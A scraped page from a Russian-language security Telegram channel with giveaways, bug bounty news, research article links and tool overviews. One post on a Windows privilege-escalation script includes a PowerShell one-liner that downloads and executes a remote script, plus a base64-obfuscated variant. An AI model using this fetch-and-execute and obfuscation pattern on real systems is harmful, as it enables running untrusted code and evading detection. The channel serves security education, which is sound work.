Похек
17K subscribers
2.13K photos
111 videos
243 files
3.09K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from infosecurity
2
Forwarded from infosecurity
⚡️Разыгрываем полезные книги по информационной безопасности и этичному хакингу (в бумажном варианте):

- Хакерство. Физические атаки с использованием хакерских устройств.
- Тестирование на проникновение с Kali Linux.
- Аппаратный хакинг: взлом реальных вещей.
- Black Hat Go: Программирование для хакеров и пентестеров.
- Black Hat Python: программирование для хакеров и пентестеров, 2-е изд.

• Всего будет 10 призовых мест, а победители смогут выбрать любую понравившуюся книгу из списка выше. Итоги подведем ровно через неделю (26.07 в 19:00) при помощи бота, который рандомно выберет победителя.

Для участия нужно:

1. Быть подписанным на мой канал @tg_infosec;
2. Подписаться на канал моих друзей @poxek;
3. Нажать на кнопку «Участвовать».
 
Учитывайте, что бот может немного подвиснуть — не переживайте, просто нажмите еще раз на кнопку «Участвовать».

#Конкурс
🔥2315😁73👾1
Forwarded from BI.ZONE Bug Bounty
💙 Начинается Bounty pass#2: Olymp

Вас ждут:

🔵Еще больше наград с накопительным бонусом

+5% с каждым новым оплачиваемым отчетом и сохранение накопленного бонуса Bounty pass#1: Progress. Лимита на накопительный бонус нет.

🔵Награды для двух покорителей Олимпа

+10% для каждого оплачиваемого отчета с 22 октября 2024 года по 21 октября 2025 года.

🔵Бонусы за личный прогресс

— Золотая награда за 10 оплаченных уязвимостей или сумма вознаграждений в размере 1 млн руб.

— Серебряная награда за 6 оплаченных уязвимостей или сумма вознаграждений в размере 600 тыс. руб.

— Бронзовая награда за 3 оплаченные уязвимости или сумма вознаграждений в размере 300 тыс. руб.

Каждая награда содержит уникальный набор мерча. Тип награды определяется по максимальному значению: либо количество уязвимостей, либо сумма вознаграждения.

Рейтинг багхантеров будет периодически обновляться в таблице олимпийцев. Результаты узнаем после 22 октября 2024 года.

P. S. Победители Bounty pass#1: Progress будут объявлены 5 августа, информация появится на сайте.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9😁5
Forwarded from Mobile AppSec World (Yury Shabalin)
Статья для начинающих свой путь в Android

Всем привет!

Статейка для тех, кто только начинает свое знакомство с Android и хотел бы попробовать свои силы на нескольких CTF, чтобы понять какого это.

В статье описаны шаги для настройки окружения:
- Создание эмулятора
- Настройка Burpsuite
- Установка Frida
- Решение двух задачек с HackTheBox

В целом ничего особо примечательного, но как базовая точка для самого популярного вопроса «Как снять пиннинг» подойдет. Конечно, далеко не на всех приложениях эти шаги и этот скрипт сработают, но тем не менее, для старта неплохо.

Ну а дальше только снимать пиннинг и другие вещи с более сложных и не учебных приложений.

Добро пожаловать в мир безопасности мобилок»

#android #frida #ctf #burp
🔥104😁2
Forwarded from Mobile AppSec World (Yury Shabalin)
Разбираемся с уязвимостью в Jetpack Navigation

Всем привет!

Относительно недавно многоуважаемый @OxFi5t подсветил исследование коллег из Positive Technologies про новый вектор атаки на Android через проблемы в библиотеке Jetpack . Спасибо огромное им за исследование, оно реально крутое!

Мы не смогли остаться в стороне, тоже немного покапались в исследовании, нашли пару интересных вещей, не освещенных в оригинальном материале и сегодня я представляю вашему вниманию результат наших трудов, статью "Разбираемся с новой уязвимостью в Android-библиотеке Jetpack Navigation".

Кроме технических деталей самой проблемы мы еще дополнительно проанализировали 1000 приложений из различных маркетов и собрали интересную статистику по подверженности данной проблеме. Если кратко, то 21% из исследованых нами приложений содержит уязвимую навигацию. Эксплуатабельны ли они это отдельный вопрос, который, я надеюсь, мы разберем в дальнейшем обязательно))

Если интересно исследование с цифрами, какие категории оказались наиболее подвержены данной проблеме - можно посмотреть у нас на сайте.

А пока - приятного чтения и спасибо еще раз коллегам за шикарную уязвимость!

#jetpack #stingray #navigation #issue #research
🔥4😁31
Убойное видео. Как я написал эксплоит для бага в Telegram и что было дальше
#xakep #telegram #1click

Помните нашумевшую багу в Telegram, когда под видом видео пользователь скачивал приложение. Так вот парень из нашего community сделал более глубокий ресерч этого бага. Статья 30 минутной давности)

Не­дав­но мне на гла­за попал­ся пост при­мер­но такого содер­жания: «В Telegram выяв­лена новая уяз­вимость, свя­зан­ная с заг­рузкой виде­оро­ликов». К пос­ту при­лага­лась демонс­тра­ция: поль­зователь получа­ет видео, при тапе по которо­му Telegram пыта­ется уста­новить сто­рон­нее при­ложе­ние. При этом проб­лема не прив­лекла осо­бен­ного вни­мания. Я решил разоб­рать­ся, работа­ет ли спо­соб, и написать к нему экс­пло­ит.


🔓 Читать дальше

🌚 @poxek | 📹 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11😁4🌚1
Bug Bounty в России: как дела с белыми русскими хакерами?
#vk #vkbugbounty

Статья от Петра, того самого чиляльщика (кто поймет, тот поймет)

Привет Хабр! Меня зовут Петр Уваров, я руководитель направления Bug Bounty в VK. Есть много статей, где багхантеры рассказывают о Bug Bounty и своем опыте в нем. Но в этой статье, я бы хотел проанализировать текущую ситуацию на российском рынке, сравнив её с тем, что было раньше, и поговорить про ситуацию с багхантерами. Некоторые вещи, которые я буду говорить прозвучат как цитаты Капитана Очевидность. Другие могут быть приписаны Генералу Ясенпеню, но тем не менее, про них стоит рассказать.

➡️ Читать далее

🌚 @poxek | 📹 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7👾2
Forwarded from Standoff 365
Miss me Cкучаешь без стримов по багбаунти?

В среду, 31 июля, в 19:00 (мск) можно будет в прямом эфире посмотреть на триаж с двух сторон: глазами компаний-вендоров и команды Standoff Bug Bounty.

🥣 Готовь вопросы или задавай их прямо под постом, а мы передадим все гостям студии, среди которых будут:

Витя aka АК-47 Тимофей Черных aka doc64 — руководитель продуктовой безопасности в Ozon c большим опытом выстраивания процессов DevSecOps и AppSec в разных компаниях.

Дарья Афанасова — руководитель группы триажа на платформе Standoff Bug Bounty.

Анатолий Иванов aka c0rv4x — идейный лидер багбаунти Standoff, белый хакер с десятилетним стажем.

Они поговорят о том, как триажеры помогают багхантерам правильно составлять отчеты и не упускать важного, чтобы оперативнее получать фидбэк и вознаграждение от вендоров. А еще обсудят, как триаж сокращает путь от получения отчета до устранения уязвимости.

Регистрируйся заранее, чтобы не пропустить стрим. Увидимся в эфире!
Команда OFFZONE любит баловать меня подарками :))

Спасибо, подняли настроение!)

А вот те футболочки, что вы видите, они пойдут победителям в недавнем конкурсе проходок. Дизайн увидите позже, но я уже заценил :))

🌚 @poxek | 📹 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥247😁21
Forwarded from infosecurity
🎉 Результаты розыгрыша:

Победители:
1. Миша (@ponomarevmisha)
2. D1caprio (@P2Plegend)
3. Валерий (@valerixyz)
4. Розовый (@Chlypka)
5. Анютыч (@Annutych)
6. Dim (@DimGridAle)
7. степанк (@preteenbastard)
8. ctlh (@justsalohiddin)
9. Dmitrii (@romule090)
10. Антон (@amkashirin)

Проверить результаты
🔥13😁8
На 10к подписчиков ждите кое что классное 🌚
Так что зовите друзей, а если уже все тут, то заведите новых и позовите сюда :))

С любовью, Похек ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
42🔥62😁2👾1
Баг Баунти для Блю тим

🌚 @poxek | 📹 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
😁36👾65
💻 Yet Another Windows PrivEsc Script
#windows #privesc

Маленький воскресный пост про очередной небольшой скрипт для поиска мисконфигураций в Windows, которые приводят к повышению привилегий. Но тем не менее репа собрали более 500 звёзд, значит заслуживает внимания.

Эксплуатация:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")


И вот простенькая обфускация:
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")'))
powershell -e $encoded



🧩 Github

🌚 @poxek | 📹 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥132
Forwarded from Road To Ipoteka
Райтап на Bug Bank oт CyberED

В июне у CyberED в их ежемесячном CTF была задачка основанная на реальном отчете на ББ, и за ее решение можно было получить ачивку и немного рейтинга на ББ платформе BI.ZONE.

Запуск задачки наложился с внутренним CTF на работе, и я залетел довольно поздно (старт был в субботу, а я открыл задачу только в понедельник). Задачка оказалась очень простая, решение заняло минут 15 – и то, я искал где подвох и внимательно смотрел по сторонам. В итоге я решил ее 31ым, но за отчет получил и ачивку и рейтинг на платформе BI.ZONE.

Собственно, решил опубликовать свой отчет, так как в комментариях был запрос 🙂
Please open Telegram to view this post
VIEW IN TELEGRAM
👾83😁1
«Ты приходишь ко мне просить бюджет на ИБ, но...»

Защита бюджета в августе для CISO — жаркое время. Успех предприятия зависит не только от способности предвидеть риски и просчитать стоимость. Главное умение переговорщика — говорить именно так, как принято в финансовых кругах 💵

Есть информация, что на вебинаре 30 июля в 11:00 можно будет пообщаться с CISO в формате непринужденной дискуссии и узнать больше про доказательную базу при обосновании бюджета ИБ, а также узнать у CFO, как уважительно подбирать аргументы в беседе с финансовым кланом💰

О чём еще поведают уважаемые представители МТС RED:
почему на ИБ стоит делать высокие ставки;
как посчитать бюджет на примере мануфактур и предприятий;
ИТ-директор как надёжный союзник в любой кампании;
тактика и манёвры защиты глазами финансового консильери.

Кому будет полезно:
директорам или руководителям службы ИБ/ИТ;
финансовый директорам;
директорам по трансформации бизнеса.

Регистрируйтесь на вебинар и готовьте вопросы! Если что, нас тут не было 🎩
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7😁3🌚3👍1
Go Exploit Framework
#go

Go-exploit — это фреймворк для разработки эксплойтов на языке Go. Этот фреймворк помогает разрабам эксплойтов создавать небольшие, портативные эксплойты. Фреймворк был разработан для упрощения массового сканирования, эксплуатации и интеграции с другими инструментами.

Документацию по API можно найти ТУТ.

Фреймворк Go Exploit включает следующие этапы, которые могут быть связаны друг с другом или выполняться независимо:

Шаг 1 - Проверка цели
Шаг 2 - Сканирование версии
Шаг 3 - Эксплуатация
Шаг 4 - Управление и контроль


Особенности Go Exploit
Фреймворк Go Exploit включает следующие дополнительные функции:

➡️Автоматическое обнаружение SSL/TLS на удаленной цели.
➡️Полная поддержка работы через прокси.
➡️Вывод в формате ключ-значение или JSON для легкой интеграции в другие автоматизированные системы.
➡️Встроенные Java гаджеты, классы и инфраструктура LDAP.
➡️Множество пейлоадов для реверс шеллов, дропперов и бинд шеллов.
➡️Функции, интегрирующие эксплуатацию с другими инструментами или фреймворками, такими как Metasploit и Sliver.
➡️Встроенный C2 для перехвата зашифрованных/незашифрованных шеллов или размещения имплантов.
➡️Поддержка различных форматов целей, включая списки, файлы, VulnCheck IP-Intel и другие.

Мое мнение об этой тулзе: пока сыровато и маловато, НО я вижу перспективу в этой тулзе и возможно когда-нибудь она стрельнет или обзаведётся кучей "обвязок", которые сделают данную тулзу полноценно боевой

🌚 @poxek | 📹 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
8👾1
api-fuzzing-lists.zip
8.7 MB
API FUZZING LISTS
#api #fuzzing

Вне очереди пост, очень вкусный сборник фаззинг вордлистов для API

Описание данного списка от автора:
744,000+ endpoints
357,000+ object properties
211,000+ object names
127,000+ query parameters
74,000+ parameter values
35,000+ path parameters
8,300+ headers
5,300+ paths
880+ common ports

Взял ТУТ

🌚 @poxek | 📹 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥33
Идёт Zaheq. Приватное пати. Пришлось сделать двойной доклад, чтобы попасть на эту тусу)

Доклад нельзя было фоткать, потому что все приватно)

Выступал я, один секретный спикер, а также Омар с докладом про Вову Хакеру (и оказалось, что название не кликбейт было)))

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥35😁73